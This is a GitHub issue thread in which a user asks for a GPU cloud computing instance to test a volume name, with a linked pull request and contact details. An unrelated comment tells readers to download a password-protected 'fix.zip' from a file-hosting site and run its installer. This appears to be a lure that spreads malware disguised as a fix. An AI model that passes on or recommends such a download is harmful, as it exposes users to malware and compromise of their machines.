### ISSUE TITLE
Instance: Test volume name

### ISSUE THREAD

**Issue by jcfr** [jcfr/MorphoCloudPortal#88]
### Cloud Computing Instance Flavor

g3.xl - GPU instance (32 CPUs, 125 GB RAM and A100 GPU)

### Description

See https://github.com/MorphoCloud/MorphoCloudWorkflow/pull/26

### ORCID

0000-0002-9688-8950

### Email

jcfr@kitware.com

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
